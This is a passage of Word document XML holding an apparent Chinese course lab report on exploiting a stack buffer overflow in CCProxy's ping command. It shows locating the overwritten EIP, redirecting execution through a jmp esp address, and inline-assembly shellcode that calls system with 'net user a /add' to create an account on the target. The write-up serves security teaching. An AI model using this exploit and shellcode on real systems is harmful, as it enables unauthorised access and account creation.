        <w:t>如果没有发生溢出，代理端会返回Host not found ,在命令行里输入比较长的字符串比较复杂，可以先使用在记事本里输入好字符串然后粘入命令行，测试当字符串有2000个a时：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4981575" cy="2257425"/>
            <wp:effectExtent l="0" t="0" r="0" b="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81575" cy="2257425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可发现发生了溢出，这时需要对溢出点进行准确的定位，通过填充不同的字符串的方法可以找到ping 后面跟的主机名覆盖到的EIP的地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="480"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r>
        <w:t>采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>二分的方法，来逐个进行尝试，最后确定哪个位置的字符串对应着栈中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>EIP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>的位置，二分法是较快的一种方法，也可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>直接跟踪。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找字符串</w:t>
      </w:r>
      <w:r>
        <w:t>Host not found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如图所示。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5764530" cy="387985"/>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4530" cy="387985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="240" w:firstLineChars="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选中该行，按</w:t>
      </w:r>
      <w:r>
        <w:t>enter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可定位到相关代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5749925" cy="1953260"/>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49925" cy="1953260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>0043037E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处下断点，向下单步到</w:t>
      </w:r>
      <w:r>
        <w:t>retn 0xc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如图</w:t>
      </w:r>
      <w:r>
        <w:t>3.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，此时的</w:t>
      </w:r>
      <w:r>
        <w:t>ESP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>011766F0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，查看堆栈，发现已经溢出，如图所示。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4945380" cy="885190"/>
            <wp:effectExtent l="0" t="0" r="7620" b="63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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4945380" cy="885190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1806575" cy="1111885"/>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6575" cy="1111885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="240" w:firstLineChars="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时，存放</w:t>
      </w:r>
      <w:r>
        <w:t>EIP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的地方存放的是填充的数据，因此要将这个数据修改成</w:t>
      </w:r>
      <w:r>
        <w:t>jmp esp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所在地址。重新构造填充数据，使得</w:t>
      </w:r>
      <w:r>
        <w:t>011766F0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处的值填充为</w:t>
      </w:r>
      <w:r>
        <w:t>7FFA4512</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，再次运行到</w:t>
      </w:r>
      <w:r>
        <w:t>retn 0xc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地方，此时的返回</w:t>
      </w:r>
      <w:r>
        <w:t>EIP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值就变成了</w:t>
      </w:r>
      <w:r>
        <w:t>jmp esp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所在的地址，如图所示。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1836420"/>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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1836420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行完</w:t>
      </w:r>
      <w:r>
        <w:t>retn 0xc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，成功跳到</w:t>
      </w:r>
      <w:r>
        <w:t>jmp esp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处，如下图所示。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4798695" cy="1294765"/>
            <wp:effectExtent l="0" t="0" r="190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stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4798695" cy="1294765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>ShellCode编写</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="360" w:firstLineChars="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本次实验Shellcode基本要求是在目标主机上创建一个用户，在本机创建用户的命令是system(</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>net user 用户名 /add</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>);因此需要在对方主机上调用system这个函数，而在windows中system这个函数在包含在msvcrt.dll这个动态链接库中的，经过查看可以发现CCPROXY软件中会加载msvcrt.dll这个动态链接库。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先,先创建这样的一份代码</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="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8280" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t>#include &lt;windows.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t>#include &lt;winbase.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t>void main()</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>LoadLibrary("msvcrt.dll");</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>__asm {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>push ebp ;保存ebp，esp－4</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>mov ebp,esp ;给ebp赋新值，将作为局部变量的基指针</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="840" w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>xor edi,edi ;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>push edi ;压入0，esp－4,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="1320" w:firstLineChars="550"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">;作用是构造字符串的结尾\0字符 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>sub esp,0ch</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>mov byte ptr [ebp-10h],6eh;n</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>mov byte ptr [ebp-0fh],65h;e</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>mov byte ptr [ebp-0eh],74h;t</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>mov byte ptr [ebp-0dh],20h;空格</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>mov byte ptr [ebp-0ch],75h;u</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>mov byte ptr [ebp-0bh],73h;s</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>mov byte ptr [ebp-0ah],65h;e</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>mov byte ptr [ebp-09h],72h;r</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>mov byte ptr [ebp-08h],20h;空格</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>mov byte ptr [ebp-07h],61h;a</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>mov byte ptr [ebp-06h],20h;空格</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>mov byte ptr [ebp-05h],2fh;/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>mov byte ptr [ebp-04h],61h;a</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>mov byte ptr [ebp-03h],64h;d</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>mov byte ptr [ebp-02h],64h;d</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>lea eax,[ebp-10h] ;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>push eax ;串地址作为参数入栈</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>mov eax, 0x77bf93c7;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>call eax ;调用system</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="360"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后，在Visual C++6.0中的调试状态下点击Go To Disassembly查看它的机器代码从00401042到0040108B的ShellCode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3333750" cy="2314575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="图片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33750" cy="2314575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将机器代码拷贝出来，添加在程序的指定的位置然后执行便可以在对方主机上添加一个用户名为a的用户</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hellcode的执行情况如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
